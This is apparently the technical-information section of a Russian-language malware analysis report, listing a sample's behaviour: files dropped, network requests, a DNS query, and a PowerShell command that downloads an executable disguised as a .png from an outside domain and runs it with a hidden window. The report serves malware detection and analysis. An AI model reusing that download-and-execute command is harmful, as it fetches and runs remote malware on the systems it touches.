Техническая информация
- http://wingsbiotech.com/kufma/sdogsodngsdlk.png как %temp%\scpsis.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://wingsbiotech.com/kufma/sdogsodngsdlk.png','%TMP%\scpsis.exe');Start-process '%TMP%\scpsis.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1376
- %TEMP%\1101413.cvr
- 'wi####iotech.com':80
- http://wi####iotech.com/kufma/sdogsodngsdlk.png
- DNS ASK wi####iotech.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://wingsbiotech.com/kufma/sdogsodngsdlk.png','%TMP%\scpsis.exe');Start-process '%TMP%\scpsis.exe';' (со скрытым окном)